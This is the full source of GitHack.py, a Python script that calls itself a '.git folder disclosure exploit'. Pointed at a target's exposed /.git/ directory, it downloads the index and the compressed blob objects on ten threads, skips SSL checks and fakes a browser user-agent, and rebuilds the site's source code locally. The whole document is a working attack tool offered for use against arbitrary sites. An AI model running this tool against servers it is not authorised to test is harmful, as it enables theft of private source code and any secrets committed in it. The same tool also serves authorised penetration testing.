1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144
| import sys try: import urllib2 import urlparse import Queue except Exception as e: import urllib.request as urllib2 import urllib.parse as urlparse import queue as Queue
import os import zlib import threading import re import time from lib.parser import parse import ssl
context = ssl._create_unverified_context() user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \ 'Chrome/99.0.4844.82 Safari/537.36' if len(sys.argv) == 1: msg = """ A `.git` folder disclosure exploit. By LiJieJie
Usage: python GitHack.py http://www.target.com/.git/ """ print(msg) sys.exit(0)
class Scanner(object): def __init__(self): self.base_url = sys.argv[-1] self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_') print('[+] Download and parse index file ...') try: data = self._request_data(sys.argv[-1] + '/index') except Exception as e: print('[ERROR] index file download failed: %s' % str(e)) exit(-1) with open('index', 'wb') as f: f.write(data) if not os.path.exists(self.domain): os.mkdir(self.domain) self.dest_dir = os.path.abspath(self.domain) self.queue = Queue.Queue() for entry in parse('index'): if "sha1" in entry.keys(): entry_name = entry["name"].strip() if self.is_valid_name(entry_name): self.queue.put((entry["sha1"].strip(), entry_name)) try: print('[+] %s' % entry['name']) except Exception as e: pass
self.lock = threading.Lock() self.thread_count = 10 self.STOP_ME = False
def is_valid_name(self, entry_name): if entry_name.find('..') >= 0 or \ entry_name.startswith('/') or \ entry_name.startswith('\\') or \ not os.path.abspath(os.path.join(self.domain, entry_name)).startswith(self.dest_dir): try: print('[ERROR] Invalid entry name: %s' % entry_name) except Exception as e: pass return False return True
@staticmethod def _request_data(url): request = urllib2.Request(url, None, {'User-Agent': user_agent}) return urllib2.urlopen(request, context=context).read()
def _print(self, msg): self.lock.acquire() try: print(msg) except Exception as e: pass self.lock.release()
def get_back_file(self): while not self.STOP_ME: try: sha1, file_name = self.queue.get(timeout=0.5) except Exception as e: break for i in range(3): try: folder = '/objects/%s/' % sha1[:2] data = self._request_data(self.base_url + folder + sha1[2:]) try: data = zlib.decompress(data) except: self._print('[Error] Fail to decompress %s' % file_name) try: data = re.sub(r'blob \d+\00', '', data) except Exception as e: data = re.sub(b"blob \\d+\00", b'', data) target_dir = os.path.join(self.domain, os.path.dirname(file_name)) if target_dir and not os.path.exists(target_dir): os.makedirs(target_dir) with open(os.path.join(self.domain, file_name), 'wb') as f: f.write(data) self._print('[OK] %s' % file_name) break except urllib2.HTTPError as e: if str(e).find('HTTP Error 404') >= 0: self._print('[File not found] %s' % file_name) break except Exception as e: self._print('[Error] %s' % str(e)) self.exit_thread()
def exit_thread(self): self.lock.acquire() self.thread_count -= 1 self.lock.release()
def scan(self): for i in range(self.thread_count): t = threading.Thread(target=self.get_back_file) t.start()
if __name__ == '__main__': s = Scanner() s.scan() try: while s.thread_count > 0: time.sleep(0.1) except KeyboardInterrupt as e: s.STOP_ME = True time.sleep(1.0) print('User Aborted.')
|